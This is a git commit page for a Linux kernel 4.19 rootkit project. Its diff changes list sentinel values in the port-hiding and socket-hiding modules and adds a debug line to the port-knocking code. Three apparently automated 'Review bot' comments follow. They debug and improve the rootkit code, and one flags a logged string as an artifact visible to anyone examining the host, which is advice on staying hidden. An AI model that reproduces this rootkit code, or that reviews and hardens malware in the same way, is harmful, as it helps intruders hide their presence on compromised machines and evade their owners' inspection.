linux-rootkit

Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)
git clone git://git.deurzen.net/linux-rootkit

commit 10f7fd5244aeaf411d68797abe6c302af555e471
parent 9dc06ea6f7cfa204baa3bc6aa9c4b1fb0994642e
Author: deurzen <m.deurzen@tum.de>
Date:   Sun, 10 Jan 2021 21:22:28 +0100

adds debug info

Diffstat:
Msrc/porthide.c | 7+++++--
Msrc/sockhide.c | 4++--
2 files changed, 7 insertions(+), 4 deletions(-)

diff --git a/src/porthide.c b/src/porthide.c
@@ -45,7 +45,7 @@ knock_list_t ips_stage3 = {
 knock_list_t_ptr ips_stage3_tail = &ips_stage3;
 lport_list_t hidden_lports = {
- .lport = -1,
+ .lport = 0,
 .prev = NULL,
 .next = NULL,
 };
@@ -145,7 +145,7 @@ remove_lport_from_list(lport_list_t_ptr list, lport_t lport)
 {
 lport_list_t_ptr i = find_lport_in_list(list, lport), ret = NULL;
- if (i && (i->lport != -1)) {
+ if (i && (i->lport != 0)) {
 if (i->next)
 i->next->prev = i->prev;
 else
@@ -208,6 +208,9 @@ remove_knock_from_list(knock_list_t_ptr list, knock_list_t_ptr *tail, ip_t ip, i
 knock_list_t_ptr i = find_knock_in_list(list, ip, version), ret = NULL;
 if (i && (!memcmp(i->ip, ip, (version == v4 ? 4 : 16)) && i->version != -1)) {
+ int knock;
+ memcpy(&knock, ip, 4);
+ DEBUG_INFO("removing ip %0X from list\n", knock);
 if (i->next)
 i->next->prev = i->prev;
 else
diff --git a/src/sockhide.c b/src/sockhide.c
@@ -13,7 +13,7 @@
 #include "porthide.h"
 port_list_t hidden_ports = {
- .port = -1,
+ .port = 0,
 .proto = -1,
 .prev = NULL,
 .next = NULL,
@@ -167,7 +167,7 @@ remove_port_from_list(port_list_t_ptr list, port_t port, proto_t proto)
 {
 port_list_t_ptr i = find_port_in_list(list, port, proto), ret = NULL;
- if (i && (i->port != -1 && i->proto != -1)) {
+ if (i && (i->port != 0 && i->proto != -1)) {
 if (i->next)
 i->next->prev = i->prev;
 else
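Review bot: The head-node marker of `hidden_lports` changes from `-1` to `0` in the first src/porthide.c hunk with no comment saying why 0 is the marker, and the commit message only says "adds debug info". The same switch is made in the `remove_lport_from_list` guard (second hunk) and in the `hidden_ports` initialiser and `remove_port_from_list` guard in src/sockhide.c. Any comparison against `-1` outside these hunks (the find and add helpers are not visible) would now disagree with the initialiser, so those are worth checking. I would add a comment above the initialiser such as `/* list head: lport 0 marks the sentinel node and is never a stored port */`, or better, a named constant shared by the initialiser and the guard.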
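Review bot: The new debug line in `remove_knock_from_list` copies four bytes of `ip` into a signed `int` whatever `version` is, although the `memcmp` just above compares 16 bytes in the non-v4 case, so a v6 address is logged as its first four bytes and reads like a v4 one. `%X` expects an unsigned argument and the `0` flag in `%0X` does nothing without a width; `unsigned int knock;` with `memcpy(&knock, ip, sizeof(knock));` and `"%08X"` fixes both, though the value is still printed in host byte order. If `DEBUG_INFO` wraps printk (not visible here), `%pI4` and `%pI6c` would print either family directly from `ip`. In a build with debug output enabled, the fixed text `removing ip` is written wherever `DEBUG_INFO` sends it, which makes it an observable artifact for anyone examining the host. The enclosing function starts and ends outside the hunk.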
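Review bot: The guard `i->port != 0 && i->proto != -1` in `remove_port_from_list` (second src/sockhide.c hunk) refuses removal when either field holds its marker value, not only when both do, so a node with port 0 and a real proto, or a real port and proto -1, is never unlinked. The head node now also mixes two marker styles (`.port = 0`, `.proto = -1`), and if `proto_t` is unsigned the `-1` comparison relies on integer conversion (the type is not visible in the hunk). If `list` is always the head node, which the hunk does not show, `if (i && i != list) {` states the intent without depending on field values. The function body continues outside the hunk.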